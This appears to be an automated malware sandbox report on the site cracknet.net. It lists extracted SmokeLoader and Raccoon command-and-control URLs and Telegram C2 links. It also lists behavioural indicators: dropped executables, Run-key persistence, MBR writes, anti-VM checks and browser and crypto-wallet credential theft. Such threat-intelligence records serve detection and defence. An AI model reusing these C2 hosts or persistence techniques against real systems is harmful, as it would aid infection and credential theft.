Analysis
-
max time kernel
195s -
max time network
242s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
13-02-2021 10:50
Static task
static1
URLScan task
urlscan1
Sample
https://cracknet.net/
Behavioral task
behavioral1
Sample
https://cracknet.net/
Resource
win10v20201028
Behavioral task
behavioral2
Sample
https://cracknet.net/
Resource
win10v20201028
Errors
General
-
Target
https://cracknet.net/
-
Sample
210213-pdsnp7g4a2
Malware Config
Extracted
smokeloader
2020
http://naritouzina.net/
http://nukaraguasleep.net/
http://notfortuaj.net/
http://natuturalistic.net/
http://zaniolofusa.net/
http://4zavr.com/upload/
http://zynds.com/upload/
http://atvua.com/upload/
http://detse.net/upload/
http://dsdett.com/upload/
http://dtabasee.com/upload/
http://yeronogles.monster/upload/
Extracted
raccoon
17694a35d42ac97e2cd3ebd196db01b372cce1b0
-
url4cnc
https://telete.in/o23felk0s
Extracted
smokeloader
2019
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
http://10022020test61-service1002012510022020.website/
http://10022020test51-service1002012510022020.xyz/
http://10022020test41-service100201pro2510022020.ru/
http://10022020yest31-service100201rus2510022020.ru/
http://10022020rest21-service1002012510022020.eu/
http://10022020test11-service1002012510022020.press/
http://10022020newfolder4561-service1002012510022020.ru/
http://10022020rustest213-service1002012510022020.ru/
http://10022020test281-service1002012510022020.ru/
http://10022020test261-service1002012510022020.space/
http://10022020yomtest251-service1002012510022020.ru/
http://10022020yirtest231-service1002012510022020.ru/
Extracted
raccoon
027bc1bb9168079d5f7473eee9c05ee06589c305
-
url4cnc
https://telete.in/jjbadb0y
Extracted
metasploit
windows/single_exec
Extracted
raccoon
9ba64f4b6fe448911470a88f09d6e7d5b92ff0ab
-
url4cnc
https://telete.in/jagressor_kz
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/3552-721-0x0000000000400000-0x0000000000C1B000-memory.dmp family_glupteba behavioral2/memory/3552-723-0x0000000001520000-0x0000000001D22000-memory.dmp family_glupteba behavioral2/memory/3552-725-0x0000000000400000-0x0000000000C1B000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/5692-667-0x00000000024C0000-0x00000000024EE000-memory.dmp family_redline behavioral2/memory/5692-669-0x0000000002530000-0x000000000255C000-memory.dmp family_redline behavioral2/memory/6912-779-0x0000000002360000-0x000000000238E000-memory.dmp family_redline behavioral2/memory/6912-781-0x0000000002400000-0x000000000242C000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
svchost.exedescription pid process target process PID 6632 created 3552 6632 svchost.exe 1B77.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Modifies boot configuration data using bcdedit 15 IoCs
Processes:
bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exepid process 6488 bcdedit.exe 736 bcdedit.exe 5344 bcdedit.exe 6684 bcdedit.exe 6828 bcdedit.exe 6852 bcdedit.exe 6732 bcdedit.exe 6500 bcdedit.exe 7156 bcdedit.exe 6992 bcdedit.exe 6380 bcdedit.exe 5604 bcdedit.exe 6412 bcdedit.exe 4676 bcdedit.exe 4744 bcdedit.exe -
XMRig Miner Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1728-769-0x0000000002600000-0x00000000026F1000-memory.dmp xmrig -
Creates new service(s) 1 TTPs
-
Executes dropped EXE 52 IoCs
Processes:
keygen-pr.exekeygen-step-1.exekeygen-step-2.exekeygen-step-3.exekeygen-step-4.exekey.exeSetup.exe6489A2274AE24900.exe6489A2274AE24900.exemd2_2efs.exe1613217354205.exefile.exeD5EE.tmp.exe1613217358815.exeD5EE.tmp.exeBTRSetp.exeinstaller.exe1613217364196.exe2682116.292181628.236320952.69Windows Host.exegdrrr.exejfiag3g_gg.exejfiag3g_gg.exeThunderFW.exeMiniThunderPlatform.exe23E04C4F32EF2158.exe23E04C4F32EF2158.tmpseed.sfx.exeseed.exeCB3B.exeCD11.exeD30D.exeCB3B.exeD948.exeE2DE.exeE8FA.exeupdatewin1.exeupdatewin2.exeupdatewin.exeF85C.exe5.exewihvgqys.exeFF52.exeFF52.exeD5D.exejfiag3g_gg.exe1B77.exe228D.exejfiag3g_gg.exe1B77.exepid process 4936 keygen-pr.exe 4764 keygen-step-1.exe 4944 keygen-step-2.exe 4904 keygen-step-3.exe 4920 keygen-step-4.exe 4536 key.exe 4788 Setup.exe 2284 6489A2274AE24900.exe 4620 6489A2274AE24900.exe 212 md2_2efs.exe 4100 1613217354205.exe 4120 file.exe 4652 D5EE.tmp.exe 3640 1613217358815.exe 4640 D5EE.tmp.exe 4424 BTRSetp.exe 4644 installer.exe 1064 1613217364196.exe 2300 2682116.29 2600 2181628.23 4340 6320952.69 4464 Windows Host.exe 2916 gdrrr.exe 3908 jfiag3g_gg.exe 1996 jfiag3g_gg.exe 1592 ThunderFW.exe 4600 MiniThunderPlatform.exe 4152 23E04C4F32EF2158.exe 4360 23E04C4F32EF2158.tmp 4508 seed.sfx.exe 3536 seed.exe 3876 CB3B.exe 4708 CD11.exe 5820 D30D.exe 5944 CB3B.exe 5692 D948.exe 1000 E2DE.exe 3940 E8FA.exe 6120 updatewin1.exe 5872 updatewin2.exe 5808 updatewin.exe 4224 F85C.exe 3800 5.exe 4792 wihvgqys.exe 4148 FF52.exe 4608 FF52.exe 4892 D5D.exe 4968 jfiag3g_gg.exe 3552 1B77.exe 6104 228D.exe 6264 jfiag3g_gg.exe 6660 1B77.exe -
Modifies Windows Firewall 1 TTPs
-
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Sets service image path in registry 2 TTPs
-
Processes:
resource yara_rule behavioral2/memory/6252-747-0x0000000000400000-0x00000000047FC000-memory.dmp upx behavioral2/memory/6252-751-0x0000000000400000-0x00000000047FC000-memory.dmp upx -
Processes:
resource yara_rule behavioral2/memory/6856-771-0x00000000008D0000-0x00000000012E9000-memory.dmp vmprotect behavioral2/memory/6488-805-0x0000000004BA0000-0x0000000004BA1000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
6320952.69description ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6320952.69 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6320952.69 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation cmd.exe -
Loads dropped DLL 25 IoCs
Processes:
MsiExec.exe6489A2274AE24900.exeMiniThunderPlatform.exeseed.exeCD11.exeE8FA.exeFF52.exe5.exeD30D.exepid process 2680 MsiExec.exe 2284 6489A2274AE24900.exe 2284 6489A2274AE24900.exe 4600 MiniThunderPlatform.exe 4600 MiniThunderPlatform.exe 4600 MiniThunderPlatform.exe 4600 MiniThunderPlatform.exe 4600 MiniThunderPlatform.exe 4600 MiniThunderPlatform.exe 4600 MiniThunderPlatform.exe 3536 seed.exe 4708 CD11.exe 4708 CD11.exe 3940 E8FA.exe 4608 FF52.exe 3800 5.exe 3800 5.exe 5820 D30D.exe 5820 D30D.exe 5820 D30D.exe 5820 D30D.exe 5820 D30D.exe 5820 D30D.exe 5820 D30D.exe 5820 D30D.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral2/memory/4340-523-0x0000000000CB0000-0x0000000000CB1000-memory.dmp themida behavioral2/memory/6856-771-0x00000000008D0000-0x00000000012E9000-memory.dmp themida behavioral2/memory/6488-805-0x0000000004BA0000-0x0000000004BA1000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
CB3B.exe2181628.23gdrrr.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\e2979542-8a63-43c8-9586-ca4e21e44702\\CB3B.exe\" --AutoStart" CB3B.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe" 2181628.23 Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" gdrrr.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
F85C.exeSetup.exe6489A2274AE24900.exe6489A2274AE24900.exemd2_2efs.exe6320952.69description ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA F85C.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Setup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6320952.69 -
Drops Chrome extension 1 IoCs
Processes:
6489A2274AE24900.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\dinnbfgjcaancbldjogonnacdonboggi\1.0.0.0_0\manifest.json 6489A2274AE24900.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 146 api.ipify.org 155 ip-api.com 302 api.2ip.ua 303 api.2ip.ua 332 api.2ip.ua -
Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
Setup.exe6489A2274AE24900.exe6489A2274AE24900.exeMiniThunderPlatform.exedescription ioc process File opened for modification \??\PhysicalDrive0 Setup.exe File opened for modification \??\PhysicalDrive0 6489A2274AE24900.exe File opened for modification \??\PhysicalDrive0 6489A2274AE24900.exe File opened for modification \??\PhysicalDrive0 MiniThunderPlatform.exe -
Drops file in System32 directory 1 IoCs
Processes:
svchost.exedescription ioc process File created C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
Setup.exe6320952.69pid process 4788 Setup.exe 4340 6320952.69 -
Suspicious use of SetThreadContext 6 IoCs
Processes:
6489A2274AE24900.exeD5EE.tmp.exewihvgqys.exeFF52.exedescription pid process target process PID 2284 set thread context of 4832 2284 6489A2274AE24900.exe firefox.exe PID 2284 set thread context of 4408 2284 6489A2274AE24900.exe firefox.exe PID 4652 set thread context of 4640 4652 D5EE.tmp.exe D5EE.tmp.exe PID 2284 set thread context of 4724 2284 6489A2274AE24900.exe firefox.exe PID 4792 set thread context of 5920 4792 wihvgqys.exe svchost.exe PID 4148 set thread context of 4608 4148 FF52.exe FF52.exe -
Drops file in Program Files directory 51 IoCs
Processes:
23E04C4F32EF2158.tmpseed.sfx.exemsiexec.exedescription ioc process File created C:\Program Files (x86)\HappyNewYear\images\is-DSMQR.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-D5IGB.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-QSPL9.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-I4QJ3.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-D96HI.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-H8PN8.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-PJIUG.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-T11AR.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-QCOV4.tmp 23E04C4F32EF2158.tmp File opened for modification C:\Program Files (x86)\HappyNewYear\unins000.dat 23E04C4F32EF2158.tmp File opened for modification C:\Program Files (x86)\HappyNewYear\seed.sfx.exe 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-TST49.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-MK8UV.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-I1HPU.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-QBN21.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-B8BC5.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-1O01O.tmp 23E04C4F32EF2158.tmp File opened for modification C:\Program Files (x86)\Seed Trade\Seed seed.sfx.exe File created C:\Program Files (x86)\gdiview\gdiview\GDIView.exe msiexec.exe File created C:\Program Files (x86)\HappyNewYear\is-8448K.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-168E1.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-AB3R9.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-8BOO0.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-NSAD4.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\Seed Trade\Seed\seed.exe seed.sfx.exe File created C:\Program Files (x86)\HappyNewYear\is-OMF0L.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-RHE5Q.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-M9N3V.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-5QCCV.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\lang\is-R3GLS.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\gdiview\gdiview\GDIView.chm msiexec.exe File created C:\Program Files (x86)\HappyNewYear\is-MHO11.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-M7HFM.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-884K0.tmp 23E04C4F32EF2158.tmp File opened for modification C:\Program Files (x86)\Seed Trade seed.sfx.exe File created C:\Program Files (x86)\HappyNewYear\is-ADCIH.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-OHB6I.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-LPVC0.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-7RDJC.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\gdiview\gdiview\readme.txt msiexec.exe File created C:\Program Files (x86)\HappyNewYear\unins000.dat 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-89JA9.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\lang\is-M0HNS.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\Seed Trade\Seed\__tmp_rar_sfx_access_check_259422421 seed.sfx.exe File opened for modification C:\Program Files (x86)\Seed Trade\Seed\seed.exe seed.sfx.exe File opened for modification C:\Program Files (x86)\HappyNewYear\DreamTrip.exe 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-6164O.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-AC0OF.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-U3SCN.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-HT5TF.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-NCQOL.tmp 23E04C4F32EF2158.tmp -
Drops file in Windows directory 10 IoCs
Processes:
msiexec.exeWerFault.exeMicrosoftEdge.exedescription ioc process File opened for modification C:\Windows\Installer\f76199e.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{9A2A452C-3057-4F5E-8C7F-41B0D566B831} msiexec.exe File created C:\Windows\Installer\f7619a0.msi msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File created C:\Windows\Installer\f76199e.msi msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSI1CAC.tmp msiexec.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Program crash 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4672 212 WerFault.exe md2_2efs.exe 940 2300 WerFault.exe 2682116.29 6116 4224 WerFault.exe F85C.exe 6488 6856 WerFault.exe A7CD.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svchost.exeseed.exe6489A2274AE24900.exeE8FA.exeFF52.exe6489A2274AE24900.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI seed.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E8FA.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI FF52.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened 